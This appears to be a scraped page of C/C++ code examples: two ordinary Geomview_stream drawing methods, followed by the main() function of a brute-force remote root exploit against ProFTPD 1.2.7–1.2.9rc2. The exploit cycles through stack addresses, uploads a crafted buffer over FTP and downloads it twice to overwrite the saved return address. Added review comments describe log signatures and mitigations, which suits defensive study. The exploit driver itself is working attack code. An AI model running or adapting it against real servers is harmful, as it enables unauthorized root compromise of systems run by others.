Beispiel #1
// Writes a `(backcolor "Camera" r g b)` command to this stream, with each
// channel of `c` divided by 255.0 before it is written.
//
// The stream is put into ASCII mode for the duration of the command; the value
// returned by set_ascii_mode() is passed back to it afterwards.
// NOTE(review): presumably that return value is the previous mode and Color
// channels are 8-bit (0-255) - confirm against the class definitions.
void
Geomview_stream::set_bg_color(const Color &c)
{
    const bool previous_mode = set_ascii_mode();

    // Convert each channel to double before dividing.
    const double red   = static_cast<double>(c.r()) / 255.0;
    const double green = static_cast<double>(c.g()) / 255.0;
    const double blue  = static_cast<double>(c.b()) / 255.0;

    *this << "(backcolor \"Camera\" " << red << green << blue << ")";

    set_ascii_mode(previous_mode);
}
Beispiel #2
// Writes a `(geometry pickplane {QUAD BINARY ...})` command followed by
// `(pickable pickplane no)` to this stream. The quad payload is the count 1
// and the four corners of `bbox` taken at z = zmin, in the order
// (xmin,ymin), (xmin,ymax), (xmax,ymax), (xmax,ymin).
void
Geomview_stream::pickplane(const Bbox_3 &bbox)
{
    // Binary mode is switched on before any payload is written.
    const bool saved_mode = set_binary_mode();

    const auto x_lo = bbox.xmin();
    const auto x_hi = bbox.xmax();
    const auto y_lo = bbox.ymin();
    const auto y_hi = bbox.ymax();
    const auto z_lo = bbox.zmin();

    (*this) << "(geometry pickplane {QUAD BINARY\n"
            << 1
            // the four corners, all on the zmin face
            << x_lo << y_lo << z_lo
            << x_lo << y_hi << z_lo
            << x_hi << y_hi << z_lo
            << x_hi << y_lo << z_lo
            // close the text bracket
            << "}) (pickable pickplane no)";

    // NOTE(review): the saved value came from set_binary_mode() but is handed
    // to set_ascii_mode(). If the two setters take opposite senses, this
    // inverts the previous mode instead of restoring it - confirm against the
    // class definition.
    set_ascii_mode(saved_mode);
}
// Entry point of a brute-force driver for the ProFTPD flaw named in the banner
// printed below (the banner gives the affected range as 1.2.7 - 1.2.9rc2).
//
// Flow, as visible in this function:
//   1. Parse the command-line options into file-level settings.
//   2. For every candidate address from stackStartAddr up to STACK_END, in
//      steps of 4: connect and log in, upload a crafted file in ASCII mode,
//      reconnect and log in again, then download that file twice.
//   3. If the loop runs to completion, print a failure message and exit(1).
//
// Returns 1 on an unrecognised option; every other path leaves through exit().
//
// Reviewer notes (defender's view):
//   - Each attempt is a pair of authenticated FTP sessions: one ASCII-mode
//     upload, then two ASCII-mode downloads of the same file. A long run of
//     such session pairs from a single client is what this loop looks like in
//     server logs.
//   - Every attempt logs in before transferring, so limiting which accounts
//     may upload files narrows exposure (how `user`/`pass` default is not
//     shown here).
//   - No cleanup is implemented in this function (see the comment after the
//     loop), so uploaded files stay under the upload path unless a helper
//     removes them - a useful artefact during incident response.
//   - Running a ProFTPD release later than the range in the banner is the
//     primary mitigation; confirm the fixed version against the vendor
//     advisory.
int main(int argc,char **argv)
{
int sleepMode=0;
char c;
// First candidate address; STACK_START is defined outside this function and
// can be overridden with -S.
unsigned int stackStartAddr=STACK_START;

// NOTE(review): whether usage() terminates the process is not visible here.
if(argc<2) usage(argv[0]);
// Options: -t server, -u user, -p password, -l local IP, -U upload path,
// -s enable the sleep before the first download, -P FTP port,
// -S start address (parsed as hexadecimal).
while((c = getopt(argc, argv, "t:u:p:l:U:sP:S:"))!= EOF) {
switch (c) {
case 't':
server=optarg;
break;
case 'u':
user=optarg;
break;
case 'p':
pass=optarg;
break;
case 'l':
localIP=optarg;
break;
case 's':
sleepMode=1;
break;
case 'U':
strncpy(uploadPath,optarg,SIZE);
break;
case 'P':
ftpPort=atoi(optarg);
break;
case 'S':
stackStartAddr=strtoul(optarg, NULL, 16);
break;
default:
usage(argv[0]);
return 1;
}
}
// The target server and the local IP are the only settings checked for
// presence.
if(server==NULL || localIP==NULL)
usage(argv[0]);

printf("proftpd 1.2.7 - 1.2.9rc2 remote r00t exploit\n");
printf(" by Haggis ([email protected])\n");

// Helper defined elsewhere in the file; its effect is not visible here.
doris_chroot_breaker();
// One iteration per candidate address; attemptNumber counts the iterations.
for(stackWriteAddr=stackStartAddr; stackWriteAddr<STACK_END; stackWriteAddr+=4, attemptNumber++) {

// Candidates rejected by this helper are skipped without any network traffic.
// NOTE(review): presumably it filters addresses containing bytes that
// ASCII-mode transfer would rewrite - confirm against the helper.
if(check_for_linefeed()==FAILURE)
continue;

retAddr=stackWriteAddr+200; // good enough for show business

// Session 1: connect, log in, upload. A connection or login failure aborts
// the whole run rather than just this attempt.
if((controlSock=connect_to_server(ftpPort))==FAILURE) {
perror("\n\nFailing to connect to remote host\n");
exit(1);
}

if(login_to_server()==FAILURE) {
close(controlSock);
printf("\nERROR: Login failed.\n");
exit(1);
}

// Any failure from here to the end of the iteration jumps to `err`, which
// closes the control socket and moves on to the next candidate.
if(set_passive_mode(UPLOAD)==FAILURE)
goto err;
if(set_ascii_mode()==FAILURE)
goto err;
if(set_path_and_filename()==FAILURE)
goto err;

// create the buffer containing RET for this
// brute-force iteration
create_exploit_buffer();

if(upload_file()==FAILURE)
goto err;
close(controlSock);

// Connect again, then login, set ASCII mode and download the exploit file.
// This will trigger the overflow; as a result, we've
// corrupted the memory pool of this session and when we
// download the file again, the stack area will be overwritten
// and we control the saved EIP.

if((controlSock=connect_to_server(ftpPort))<0) {
perror("\nFailed to connect to remote host\n");
exit(1);
}

// NOTE(review): unlike the first login, the results of these two calls are
// not checked, and login_to_server is called with arguments here but with
// none above.
login_to_server(user,pass);
set_path_and_filename();
if(set_ascii_mode()==FAILURE)
goto err;
if(set_passive_mode(DOWNLOAD)==FAILURE)
goto err;
// With -s, wait 10 seconds before the first download.
if(sleepMode)
sleep(10);
if(download_file(NORMAL_DOWNLOAD)==FAILURE)
goto err;

// Finally, read the file again. This will trigger the stack
// overwrite (NOT the overflow, that happened earlier). We could
// control EIP at this point and r00t may be only heartbeat away...

if(set_passive_mode(DOWNLOAD)==FAILURE)
goto err;
if(download_file(EXPLOIT_DOWNLOAD)==FAILURE)
goto err;
// Reached on the success path as well as on errors: the control socket is
// closed at the end of every iteration.
err: 
close(controlSock);
}

// This is only reached if the bruteforce fails.
// delete the exploit files here
// NOTE(review): no deletion code follows, so files uploaded during the run
// are left on the server.

printf("\n\nNo r00t for you today I'm afraid.\n");
exit(1);
}